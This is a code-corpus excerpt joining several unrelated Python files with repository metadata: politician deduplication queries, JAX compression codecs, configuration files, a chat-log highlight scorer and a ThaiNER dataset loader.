status += "FETCH_POLITICIANS_FROM_NON_UNIQUE_IDENTIFIERS_COUNT1 "
# twitter handle does not exist, next look up against other data that might match
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search by Candidate name exact match
try:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
Q(politician_name__iexact=politician_name) |
Q(google_civic_candidate_name__iexact=politician_name) |
Q(google_civic_candidate_name2__iexact=politician_name) |
Q(google_civic_candidate_name3__iexact=politician_name)
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_count = politician_query.count()
if positive_value_exists(politician_count):
return politician_count
except Politician.DoesNotExist:
status += "FETCH_POLITICIANS_FROM_NON_UNIQUE_IDENTIFIERS_COUNT2 "
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search for Candidate(s) that contains the same first and last names
first_name = extract_first_name_from_full_name(politician_name)
last_name = extract_last_name_from_full_name(politician_name)
if positive_value_exists(first_name) and positive_value_exists(last_name):
try:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
(Q(politician_name__icontains=first_name) & Q(politician_name__icontains=last_name)) |
(Q(google_civic_candidate_name__icontains=first_name) &
Q(google_civic_candidate_name__icontains=last_name)) |
(Q(google_civic_candidate_name2__icontains=first_name) &
Q(google_civic_candidate_name2__icontains=last_name)) |
(Q(google_civic_candidate_name3__icontains=first_name) &
Q(google_civic_candidate_name3__icontains=last_name))
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_count = politician_query.count()
if positive_value_exists(politician_count):
return politician_count
except Politician.DoesNotExist:
status += "FETCH_POLITICIANS_FROM_NON_UNIQUE_IDENTIFIERS_COUNT3 "
return 0
def retrieve_politicians_are_not_duplicates_list(self, politician_we_vote_id, read_only=True):
"""
Get a list of other politician_we_vote_id's that are not duplicates
:param politician_we_vote_id:
:param read_only:
:return:
"""
# Note that the direction of the linkage does not matter
politicians_are_not_duplicates_list1 = []
politicians_are_not_duplicates_list2 = []
status = ""
try:
if positive_value_exists(read_only):
politicians_are_not_duplicates_list_query = \
PoliticiansAreNotDuplicates.objects.using('readonly').filter(
politician1_we_vote_id__iexact=politician_we_vote_id,
)
else:
politicians_are_not_duplicates_list_query = PoliticiansAreNotDuplicates.objects.filter(
politician1_we_vote_id__iexact=politician_we_vote_id,
)
politicians_are_not_duplicates_list1 = list(politicians_are_not_duplicates_list_query)
success = True
status += "POLITICIANS_NOT_DUPLICATES_LIST_UPDATED_OR_CREATED1 "
except PoliticiansAreNotDuplicates.DoesNotExist:
# No data found. Try again below
success = True
status += 'NO_POLITICIANS_NOT_DUPLICATES_LIST_RETRIEVED_DoesNotExist1 '
except Exception as e:
success = False
status += "POLITICIANS_NOT_DUPLICATES_LIST_NOT_UPDATED_OR_CREATED1: " + str(e) + ' '
if success:
try:
if positive_value_exists(read_only):
politicians_are_not_duplicates_list_query = \
PoliticiansAreNotDuplicates.objects.using('readonly').filter(
politician2_we_vote_id__iexact=politician_we_vote_id,
)
else:
politicians_are_not_duplicates_list_query = \
PoliticiansAreNotDuplicates.objects.filter(
politician2_we_vote_id__iexact=politician_we_vote_id,
)
politicians_are_not_duplicates_list2 = list(politicians_are_not_duplicates_list_query)
success = True
status += "POLITICIANS_NOT_DUPLICATES_LIST_UPDATED_OR_CREATED2 "
except PoliticiansAreNotDuplicates.DoesNotExist:
success = True
status += 'NO_POLITICIANS_NOT_DUPLICATES_LIST_RETRIEVED2_DoesNotExist2 '
except Exception as e:
success = False
status += "POLITICIANS_NOT_DUPLICATES_LIST_NOT_UPDATED_OR_CREATED2: " + str(e) + ' '
politicians_are_not_duplicates_list = \
politicians_are_not_duplicates_list1 + politicians_are_not_duplicates_list2
politicians_are_not_duplicates_list_found = positive_value_exists(len(politicians_are_not_duplicates_list))
politicians_are_not_duplicates_list_we_vote_ids = []
for one_entry in politicians_are_not_duplicates_list:
if one_entry.politician1_we_vote_id != politician_we_vote_id:
politicians_are_not_duplicates_list_we_vote_ids.append(one_entry.politician1_we_vote_id)
elif one_entry.politician2_we_vote_id != politician_we_vote_id:
politicians_are_not_duplicates_list_we_vote_ids.append(one_entry.politician2_we_vote_id)
results = {
'success': success,
'status': status,
'politicians_are_not_duplicates_list_found': politicians_are_not_duplicates_list_found,
'politicians_are_not_duplicates_list': politicians_are_not_duplicates_list,
'politicians_are_not_duplicates_list_we_vote_ids': politicians_are_not_duplicates_list_we_vote_ids,
}
return results
def retrieve_politicians_with_misformatted_names(self, start=0, count=15):
"""
        Get `count` records (default 15), starting at `start`, whose names have 3 capitalized letters in a row,
        as long as those letters are not 'III', i.e. King Henry III. Also exclude the names where the word
        "WITHDRAWN" has been appended when the politician withdrew from the race.
SELECT * FROM public.politician_politician WHERE politician_name ~ '.*?[A-Z][A-Z][A-Z].*?' and
politician_name !~ '.*?III.*?'
        :param start:
        :param count:
        :return:
"""
politician_query = Politician.objects.all()
# Get all politicians that have three capital letters in a row in their name, but exclude III (King Henry III)
politician_query = politician_query.filter(politician_name__regex=r'.*?[A-Z][A-Z][A-Z].*?(?<!III)').\
order_by('politician_name')
number_of_rows = politician_query.count()
politician_query = politician_query[start:(start+count)]
politician_list_objects = list(politician_query)
results_list = []
# out = ''
# out = 'KING HENRY III => ' + display_full_name_with_correct_capitalization('KING HENRY III') + ", "
for x in politician_list_objects:
name = x.politician_name
if name.endswith('WITHDRAWN') and not bool(re.match('^[A-Z]+$', name)):
continue
x.person_name_normalized = display_full_name_with_correct_capitalization(name)
x.party = x.political_party
results_list.append(x)
# out += name + ' = > ' + x.person_name_normalized + ', '
return results_list, number_of_rows
def update_or_create_politicians_are_not_duplicates(self, politician1_we_vote_id, politician2_we_vote_id):
"""
        Either update or create a PoliticiansAreNotDuplicates entry.
"""
exception_multiple_object_returned = False
success = False
new_politicians_are_not_duplicates_created = False
politicians_are_not_duplicates = None
status = ""
if positive_value_exists(politician1_we_vote_id) and positive_value_exists(politician2_we_vote_id):
try:
updated_values = {
'politician1_we_vote_id': politician1_we_vote_id,
'politician2_we_vote_id': politician2_we_vote_id,
}
politicians_are_not_duplicates, new_politicians_are_not_duplicates_created = \
PoliticiansAreNotDuplicates.objects.update_or_create(
                    politician1_we_vote_id__iexact=politician1_we_vote_id,
politician2_we_vote_id__iexact=politician2_we_vote_id,
defaults=updated_values)
success = True
status += "POLITICIANS_ARE_NOT_DUPLICATES_UPDATED_OR_CREATED "
except PoliticiansAreNotDuplicates.MultipleObjectsReturned as e:
success = False
status += 'MULTIPLE_MATCHING_POLITICIANS_ARE_NOT_DUPLICATES_FOUND_BY_POLITICIAN_WE_VOTE_ID '
exception_multiple_object_returned = True
except Exception as e:
status += 'EXCEPTION_UPDATE_OR_CREATE_POLITICIANS_ARE_NOT_DUPLICATES ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'new_politicians_are_not_duplicates_created': new_politicians_are_not_duplicates_created,
'politicians_are_not_duplicates': politicians_are_not_duplicates,
}
return results
class PoliticianTagLink(models.Model):
"""
A confirmed (undisputed) link between tag & item of interest.
"""
tag = models.ForeignKey(Tag, null=False, blank=False, verbose_name='tag unique identifier',
on_delete=models.deletion.DO_NOTHING)
politician = models.ForeignKey(Politician, null=False, blank=False, verbose_name='politician unique identifier',
on_delete=models.deletion.DO_NOTHING)
# measure_id
# office_id
# issue_id
class PoliticianTagLinkDisputed(models.Model):
"""
This is a highly disputed link between tag & item of interest. Generated from 'tag_added', and tag results
    are only shown to people within the cloud of the voter who posted.
We split off how things are tagged to avoid conflict wars between liberals & conservatives
(Deal with some tags visible in some networks, and not in others - ex/ #ObamaSucks)
"""
tag = models.ForeignKey(Tag, null=False, blank=False, verbose_name='tag unique identifier',
on_delete=models.deletion.DO_NOTHING)
politician = models.ForeignKey(Politician, null=False, blank=False, verbose_name='politician unique identifier',
on_delete=models.deletion.DO_NOTHING)
# measure_id
# office_id
# issue_id
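# Illustrative usage sketch (not part of the original module). `manager` stands for an
# instance of the manager class these retrieve/create helpers belong to (defined earlier
# in this file), and the state, handle and name values are made up. The duplicate lookup
# cascades from Twitter handle to exact name to first+last name, so callers check
# 'politician_found' (exactly one match) before 'politician_list_found' (several matches):
#     results = manager.retrieve_politicians_from_non_unique_identifiers(
#         state_code='ca', politician_twitter_handle='examplehandle',
#         politician_name='Jane Doe', read_only=True)
#     if results['politician_found']:
#         politician = results['politician']
#     elif results['politician_list_found']:
#         possible_duplicates = results['politician_list']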
| 49.17791 | 120 | 0.618034 |
df44ca74a12f43bd9e431c0a1504b13ff7879808 | 5,377 | py | Python | src/kompressor/utils.py | rosalindfranklininstitute/kompressor | 9634bf605985827ba1ca7f028f488f8eac78cb53 | [
"MIT"
] | 3 | 2022-03-08T18:19:32.000Z | 2022-03-14T19:58:01.000Z | src/kompressor/utils.py | rosalindfranklininstitute/kompressor | 9634bf605985827ba1ca7f028f488f8eac78cb53 | [
"MIT"
] | 10 | 2022-03-01T12:03:01.000Z | 2022-03-10T08:47:21.000Z | src/kompressor/utils.py | rosalindfranklininstitute/kompressor | 9634bf605985827ba1ca7f028f488f8eac78cb53 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2020 Joss Whittle
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import jax
import jax.numpy as jnp
@jax.jit
def encode_values_raw(pred, gt):
return jnp.int32(gt) - jnp.int32(pred)
@jax.jit
def decode_values_raw(pred, encoded):
return jnp.int32(pred) + jnp.int32(encoded)
@jax.jit
def encode_values_uint8(pred, gt):
return jnp.uint8(((jnp.int32(gt) - jnp.int32(pred)) + 256) % 256)
@jax.jit
def decode_values_uint8(pred, encoded):
return jnp.uint8(((jnp.int32(pred) + jnp.int32(encoded)) + 256) % 256)
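# Illustrative arithmetic for the uint8 codec above (the values are made up): with a
# prediction of 200 and a ground truth of 10, encode_values_uint8 gives
# (10 - 200 + 256) % 256 = 66, and decode_values_uint8 recovers
# (200 + 66 + 256) % 256 = 10, so residuals wrap around rather than overflowing uint8.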
@jax.jit
def encode_values_uint16(pred, gt):
return jnp.uint16(((jnp.int32(gt) - jnp.int32(pred)) + 65536) % 65536)
@jax.jit
def decode_values_uint16(pred, encoded):
return jnp.uint16(((jnp.int32(pred) + jnp.int32(encoded)) + 65536) % 65536)
@jax.jit
def encode_categorical(pred, gt):
# Output shape and dtype determined from reference values
shape = gt.shape
dtype = gt.dtype
# Determine the descending order indexing for the logits at each spatial location and channel
logit_ranks = jnp.argsort(pred).astype(dtype)[..., ::-1]
# Flatten logit ranks from [B, ...SPATIAL..., C, L] to [-1, L]
flat_logit_ranks = jnp.reshape(logit_ranks, (-1, logit_ranks.shape[-1]))
# Flatten gt from [B, ...SPATIAL..., C] to [-1,]
flat_gt = jnp.reshape(gt, (-1,))
# Perform argwhere for a single location and channel
def argwhere(logit_ranks, gt):
return jnp.argmax(logit_ranks == gt).astype(dtype)
# Distribute the argwhere over all spatial locations and channels
flat_encoded = jax.vmap(argwhere)(flat_logit_ranks, flat_gt)
# Reshape the encoded values back into the shape of the gt tensor
encoded = jnp.reshape(flat_encoded, shape)
return encoded
@jax.jit
def decode_categorical(pred, encoded):
# Output shape and dtype determined from encoded values
shape = encoded.shape
dtype = encoded.dtype
# Determine the descending order indexing for the logits at each spatial location and channel
logit_ranks = jnp.argsort(pred).astype(dtype)[..., ::-1]
# Flatten logit ranks from [B, ...SPATIAL..., C, L] to [-1, L]
flat_logit_ranks = jnp.reshape(logit_ranks, (-1, logit_ranks.shape[-1]))
# Flatten encoded from [B, ...SPATIAL..., C] to [-1,]
flat_encoded = jnp.reshape(encoded, (-1,))
# Perform indexing for a single location and channel
def index(logit_ranks, encoded):
return logit_ranks[encoded]
# Distribute the indexing over all spatial locations and channels
flat_decoded = jax.vmap(index)(flat_logit_ranks, flat_encoded)
# Reshape the decoded values back into the shape of the encoded tensor
decoded = jnp.reshape(flat_decoded, shape)
return decoded
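# Round-trip sketch for the categorical codec above (shapes are illustrative and not
# taken from the library's tests): for logits `pred` of shape [B, ...SPATIAL..., C, L]
# and integer labels `gt` of shape [B, ...SPATIAL..., C] with values in [0, L), the
# encoding stores the rank of the true label under `pred`, so decoding is exact:
#     encoded = encode_categorical(pred, gt)
#     decoded = decode_categorical(pred, encoded)
#     assert jnp.all(decoded == gt)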
def yield_chunks(max_value, chunk):
# Assert max value is positive
assert max_value > 0
    # Assert chunk size is valid (must exceed 3 so the chunk stride of (chunk - 3) stays positive)
    assert chunk > 3
if chunk >= max_value:
        # If we can process in a single chunk then yield that chunk with no padding
yield (0, max_value), (0, 0)
else:
# Yield a set of constant sized chunks along one axis including boundary conditions
for idx in range(0, max_value, (chunk-3)):
# Far edge of chunk, clamped against the right edge
i1 = min(max_value, (idx+(chunk-2)))
# Does this chunk border on the rightmost edge
last = (i1 == max_value)
# Near edge of chunk, constraining that every chunk must be of constant size
i0 = max(0, ((i1-(chunk-2)) if last else idx))
            # Does this chunk border on the leftmost edge
first = (i0 == 0)
# Calculate constant width padding
p0 = 0 if first else (2 if last else 1)
p1 = 0 if last else (2 if first else 1)
# Assert singleton chunk was handled by the other if-branch
assert not (first and last)
# Assert that the total padding was length 2 to ensure constant sized chunks
assert (p0 + p1) == 2
# Yield the chunk and the dynamic padding
yield (i0, i1), (p0, p1)
# Prevent duplicating last chunk
if last:
break
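# Illustrative consumption sketch (the `data` array and chunk size are assumptions):
# each yielded ((i0, i1), (p0, p1)) pair marks a chunk plus the padding needed so that
# the padded window data[i0 - p0 : i1 + p1] keeps a constant size of `chunk` elements
# whenever chunk < max_value, letting tiled processing reuse one fixed window shape:
#     for (i0, i1), (p0, p1) in yield_chunks(data.shape[0], chunk=32):
#         window = data[(i0 - p0):(i1 + p1)]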
def validate_padding(padding):
# Assert valid padding
assert isinstance(padding, int)
assert padding >= 0
| 33.191358 | 97 | 0.677329 |
26f660801033e59ea249419f22c5edbb0c4c38af | 1,089 | py | Python | config.py | AwkwardAxotl/WaterBender | 36cd90eb9ef6aaa2f7d41b701f7d79b9972c0c44 | [
"MIT"
] | null | null | null | config.py | AwkwardAxotl/WaterBender | 36cd90eb9ef6aaa2f7d41b701f7d79b9972c0c44 | [
"MIT"
] | null | null | null | config.py | AwkwardAxotl/WaterBender | 36cd90eb9ef6aaa2f7d41b701f7d79b9972c0c44 | [
"MIT"
] | null | null | null | SEED = 12345
MAP_SIZE = 10000
# GRAPH
GRAPH_MAX_POINTS = 7500
GRAPH_RELAXATIONS = 2
POINT_RADIUS = 15
# GEO
STARTING_LAND = True
STARTING_LAND_SIZE = 5000
STARTING_LAND_POS = (5000, 5000)
LAND_PERLIN_WEIGHT = 1.25
LAND_RADIAL_WEIGHT = 1.1
LAND_THRESHOLD = 1.0
LAND_CORNER_FACTOR = 0.3
ELEVATION_OCEAN_WEIGHT = .8
ELEVATION_PERLIN_WEIGHT = 1.25
RANDOM_LAKE_FACTOR = 0.03
LAND_MASS_CULL_SIZE = 15
DRAW_CORNERS = False
DRAW_REGION_OUTLINE = True
REGION_OUTLINE_WIDTH = 10
DRAW_ELEVATION_ON_REGIONS = False
DRAW_DISTANCE_FROM_OCEAN_REGIONS = False
DRAW_DISTANCE_FROM_WATER_REGIONS = False
DRAW_DISTANCE_FROM_OCEAN_CORNERS = False
DRAW_DISTANCE_FROM_WATER_CORNERS = False
DRAW_REGIONS_NORMAL = False
DRAW_REGIONS_ELEVATION = False
DRAW_REGIONS_ELEVATION_COLORED = True
DRAW_REGIONS_OCEAN_DISTANCE = False
DRAW_REGIONS_WATER_DISTANCE = False
# GUI
SCREEN_WIDTH = 1000
SCREEN_HEIGHT = 800
BUTTON_BUFFER = 10
BUTTON_WIDTH = 200
BUTTON_HEIGHT = 50
BUTTON_FONT = 'ariel'
BUTTON_FONT_SIZE = 20
BUTTON_RESET_TIME = 0.1
VIEWPORT_MOVING_SPEED = 200
VIEWPORT_MAX_ZOOM = 8
VIEWPORT_SIZE = 800
| 19.446429 | 40 | 0.820937 |
92ee5e105ea9af6be4a292a45249b97048120dc5 | 1,897 | py | Python | doc/source/conf.py | zfphil/htdeblur | ac557284f9913292721a6b9f943ff9b921043978 | [
"BSD-3-Clause"
] | 2 | 2020-01-16T18:30:55.000Z | 2020-02-06T08:33:51.000Z | doc/source/conf.py | zfphil/htdeblur | ac557284f9913292721a6b9f943ff9b921043978 | [
"BSD-3-Clause"
] | null | null | null | doc/source/conf.py | zfphil/htdeblur | ac557284f9913292721a6b9f943ff9b921043978 | [
"BSD-3-Clause"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'htdeblur'
copyright = '2019, Zack Phillips, Sarah Dean'
author = 'Zack Phillips, Sarah Dean'
# The full version, including alpha/beta/rc tags
release = '0.1'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
]
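# For example, built-in extensions could be enabled like this (commented out because
# this project does not currently use any):
# extensions = [
#     'sphinx.ext.autodoc',
#     'sphinx.ext.napoleon',
# ]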
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
| 33.875 | 79 | 0.662098 |
9ec2f14cced1cf5706237f64ceb1ff2113a1cb13 | 96 | py | Python | python/testData/quickFixes/PyWrapInExceptionQuickFixTest/inFunction.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/quickFixes/PyWrapInExceptionQuickFixTest/inFunction.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/quickFixes/PyWrapInExceptionQuickFixTest/inFunction.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def foo():
raise <error descr="Raising a string exception">"String"<caret> "String1"</error> | 48 | 85 | 0.697917 |
9bfd39ce71554b31a0fe7709ed3aa2499d8b8a01 | 6,041 | py | Python | upload/chatAnalyze.py | zinuzian-portfolio/LAJI | fd1122099fca68e9b5b2b62001d956e1fa57655c | [
"MIT"
] | 2 | 2019-07-24T09:29:24.000Z | 2021-01-16T13:13:52.000Z | upload/chatAnalyze.py | zinuzian-portfolio/LAJI | fd1122099fca68e9b5b2b62001d956e1fa57655c | [
"MIT"
] | 21 | 2019-08-28T09:20:34.000Z | 2022-02-10T10:13:37.000Z | upload/chatAnalyze.py | zinuzian-portfolio/HighlightU | fd1122099fca68e9b5b2b62001d956e1fa57655c | [
"MIT"
] | 1 | 2021-06-14T20:21:59.000Z | 2021-06-14T20:21:59.000Z | from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from collections import Counter, OrderedDict
from .repeatReplacer import RepeatReplacer
# from sklearn.preprocessing import normalize
import operator
import re
'''
1. Load the chat log and the words used for scoring
2. Preprocess the log by reading one line at a time
3. Store each sentence's result as a dictionary {time: preprocessed words} collected in a list
4. Review that list of dictionaries and score each entry against the labeled words
5. Store each sentence's result as a dictionary {time: normalized score} collected in a list
6. Return the list when the caller requests it
'''
# How to Use
'''
labeldwords = ['a set of lists of words']
f = open("test.txt", 'rt', encoding='UTF8')
chatanlyze = ChatAnalyze(f, labeldwords)
score = chatanlyze.Preprocessing()
result = chatanlyze.Scoring(score)
sectioned_result = chatanlyze.Sectioned_Scoring(result, 5)
cand = chatanlyze.makeCandidateList(histogram=sectioned_result,
numOfMaximumHighlight=10,
delay=1000,
videoLen=19000)
'''
class ChatAnalyze:
# chatlog <== file = open("test.txt", 'rt', encoding='UTF8')
# labeledwords <== list
# table_time = list()
# table_data = list()
# Final_Result = dict()
def __init__(self, chatlog, labeledwords):
# server setting
import nltk
nltk.download('stopwords')
nltk.download('punkt')
nltk.download('wordnet')
self.chatlog = chatlog
self.labeledwords = labeledwords
self.table_time = list()
self.table_data = list()
self.Final_Result = dict()
self.Sectioned_Result = dict()
def Preprocessing(self):
        # Line-by-line separating
while True:
line = self.chatlog.readline().lower()
if not line:
break
timeline, data = line.split(" ", maxsplit=1)
self.table_time.append(timeline)
self.table_data.append(data)
score = [0]*len(self.table_time)
return score
def Scoring(self, score):
ps = PorterStemmer()
iteration = 0
# Stopwords and Replacer
stopWords = set(stopwords.words('english'))
replacer = RepeatReplacer()
        # Append the most frequent terms (the top 20 not already present) to the labeled words
filtered_sentence = []
for eachData in self.table_data:
words = word_tokenize(eachData)
output = []
for check in words:
                # Collapse repeated characters, then strip non-word characters
check = replacer.replace(check)
check = re.sub(r'[^\w]', '', check)
output.append(check)
for w in output:
if w not in stopWords and not w.isdigit():
filtered_sentence.append(w)
# Delete "" [Exception Handling]
counts = Counter(filtered_sentence)
del counts[""]
# Sort by counts.value ( most freqent words )
counts = OrderedDict(counts.most_common())
i = 0
        # Check whether the most frequent word is already in the labeled words
        # if yes, skip it and check the next one
        # if no, append it
while iteration < 20:
if list(counts.keys())[i] not in self.labeledwords:
self.labeledwords.append(list(counts.keys())[i])
i += 1
iteration += 1
else:
i += 1
print("[Label words]")
print(self.labeledwords, end="\n")
# Scoring
        for data_index, eachData in enumerate(self.table_data):
            words = word_tokenize(eachData)
            target_score = 0
            for word in words:
                if ps.stem(word) in self.labeledwords:
                    target_score += 1
            # Use the enumerate index so duplicate messages keep their own scores
            # (list.index() would always point at the first occurrence)
            score[data_index] = target_score
# Result
result = sorted(Counter(self.table_time).items())
index = 0
for eachResult in result:
            # Number of chat messages that share this timestamp
iteration = eachResult[1]
sum = 0
for i in range(iteration):
sum += score[i+index]
self.Final_Result[eachResult[0]] = sum
index += iteration
return self.Final_Result
# finalresult = dict(), section = int (how many sector you want in timeline)
def Sectioned_Scoring(self, finalresult, section):
result = list()
# Finalresult (dict) to result (list)
for key, value in finalresult.items():
temp = [key, value]
result.append(temp)
for eachResult in result:
sum = 0
            # Only sum full windows; once the window would run past the end, normalize and return
if (result.index(eachResult) + section) <= len(result):
startindex = result.index(eachResult)
sumList = result[startindex: startindex + section]
for eachsumList in sumList:
sum += eachsumList[1]
self.Sectioned_Result[eachResult[0]] = sum
else:
return normalizing(self.Sectioned_Result)
def normalizing(Sectioned_Result):
# Normalization
max_sum = max(Sectioned_Result.items(),
key=operator.itemgetter(1))[1]
for key, value in Sectioned_Result.items():
Sectioned_Result[key] = value / max_sum
return Sectioned_Result
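# Illustrative arithmetic for normalizing (timestamps and scores are made up): dividing
# every windowed score by the maximum maps {'0:01:00': 3, '0:01:05': 6} to
# {'0:01:00': 0.5, '0:01:05': 1.0}, so the histogram handed to highlight selection is
# always scaled to the range [0, 1].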
# How to use this class
if __name__ == '__main__':
labeldwords = ['pog', 'poggers', 'pogchamp', 'holy', 'shit', 'wow', 'ez', 'clip', 'nice',
'omg', 'wut', 'gee', 'god', 'dirty', 'way', 'moly', 'wtf', 'fuck', 'crazy', 'omfg']
f = open("test.txt", 'rt', encoding='UTF8')
chatanlyze = ChatAnalyze(f, labeldwords)
score = chatanlyze.Preprocessing()
result = chatanlyze.Scoring(score)
    sectioned_result = chatanlyze.Sectioned_Scoring(result, 5)
# print(cand)
| 31.139175 | 102 | 0.583182 |
29922d970f25d34c203abc65b655df1f369694a6 | 687 | py | Python | LeetCode/Python3/Math/168. Excel Sheet Column Title.py | WatsonWangZh/CodingPractice | dc057dd6ea2fc2034e14fd73e07e73e6364be2ae | [
"MIT"
] | 11 | 2019-09-01T22:36:00.000Z | 2021-11-08T08:57:20.000Z | LeetCode/Python3/Math/168. Excel Sheet Column Title.py | WatsonWangZh/LeetCodePractice | dc057dd6ea2fc2034e14fd73e07e73e6364be2ae | [
"MIT"
] | null | null | null | LeetCode/Python3/Math/168. Excel Sheet Column Title.py | WatsonWangZh/LeetCodePractice | dc057dd6ea2fc2034e14fd73e07e73e6364be2ae | [
"MIT"
] | 2 | 2020-05-27T14:58:52.000Z | 2020-05-27T15:04:17.000Z | # Given a positive integer, return its corresponding column title as appear in an Excel sheet.
# For example:
# 1 -> A
# 2 -> B
# 3 -> C
# ...
# 26 -> Z
# 27 -> AA
# 28 -> AB
# ...
# Example 1:
# Input: 1
# Output: "A"
# Example 2:
# Input: 28
# Output: "AB"
# Example 3:
# Input: 701
# Output: "ZY"
class Solution(object):
def convertToTitle(self, n):
"""
:type n: int
:rtype: str
"""
        # Simulation. Time: O(log n), Space: O(1)
capitals = [chr(x) for x in range(ord('A'), ord('Z')+1)]
res = []
while n>0:
res.append(capitals[(n-1)%26])
n = (n-1)//26
return ''.join(res[::-1]) | 19.083333 | 94 | 0.462882 |
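# Minimal self-check sketch (not part of the original solution): the (n-1) % 26 and
# (n-1) // 26 steps make the mapping bijective, e.g. 28 -> 'B' then 'A' -> "AB".
if __name__ == "__main__":
    solution = Solution()
    assert solution.convertToTitle(1) == "A"
    assert solution.convertToTitle(28) == "AB"
    assert solution.convertToTitle(701) == "ZY"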
ed54647747e9d405ccb57e0d1c98fa497abe942b | 5,066 | py | Python | datasets/thainer/thainer.py | rkc007/datasets | 6b2f6cd7e55323898d3562b99bc9ab7244955aa3 | [
"Apache-2.0"
] | 7 | 2021-01-04T22:18:26.000Z | 2021-07-10T09:13:29.000Z | datasets/thainer/thainer.py | rkc007/datasets | 6b2f6cd7e55323898d3562b99bc9ab7244955aa3 | [
"Apache-2.0"
] | null | null | null | datasets/thainer/thainer.py | rkc007/datasets | 6b2f6cd7e55323898d3562b99bc9ab7244955aa3 | [
"Apache-2.0"
] | 3 | 2021-01-03T22:08:20.000Z | 2021-08-12T20:09:39.000Z | from __future__ import absolute_import, division, print_function
import datasets
_CITATION = """\
@misc{Wannaphong Phatthiyaphaibun_2019,
title={wannaphongcom/thai-ner: ThaiNER 1.3},
url={https://zenodo.org/record/3550546},
DOI={10.5281/ZENODO.3550546},
abstractNote={Thai Named Entity Recognition},
publisher={Zenodo},
author={Wannaphong Phatthiyaphaibun},
year={2019},
month={Nov}
}
"""
_LICENSE = "CC-BY 3.0"
_DESCRIPTION = """\
ThaiNER (v1.3) is a 6,456-sentence named entity recognition dataset created from expanding the 2,258-sentence
[unnamed dataset](http://pioneer.chula.ac.th/~awirote/Data-Nutcha.zip) by
[Tirasaroj and Aroonmanakun (2012)](http://pioneer.chula.ac.th/~awirote/publications/).
It is used to train NER taggers in [PyThaiNLP](https://github.com/PyThaiNLP/pythainlp).
The NER tags are annotated by [Tirasaroj and Aroonmanakun (2012)]((http://pioneer.chula.ac.th/~awirote/publications/))
for 2,258 sentences and the rest by [@wannaphong](https://github.com/wannaphong/).
The POS tags are done by [PyThaiNLP](https://github.com/PyThaiNLP/pythainlp)'s `perceptron` engine trained on `orchid_ud`.
[@wannaphong](https://github.com/wannaphong/) is now the only maintainer of this dataset.
"""
class ThaiNerConfig(datasets.BuilderConfig):
"""BuilderConfig for ThaiNer."""
def __init__(self, **kwargs):
"""BuilderConfig for ThaiNer.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(ThaiNerConfig, self).__init__(**kwargs)
class Thainer(datasets.GeneratorBasedBuilder):
_DOWNLOAD_URL = "https://github.com/wannaphong/thai-ner/raw/master/model/1.3/data-pos.conll"
_SENTENCE_SPLITTERS = ["", " ", "\n"]
_POS_TAGS = [
"ADJ",
"ADP",
"ADV",
"AUX",
"CCONJ",
"DET",
"NOUN",
"NUM",
"PART",
"PRON",
"PROPN",
"PUNCT",
"SCONJ",
"VERB",
]
_NER_TAGS = [
"B-DATE",
"B-EMAIL",
"B-LAW",
"B-LEN",
"B-LOCATION",
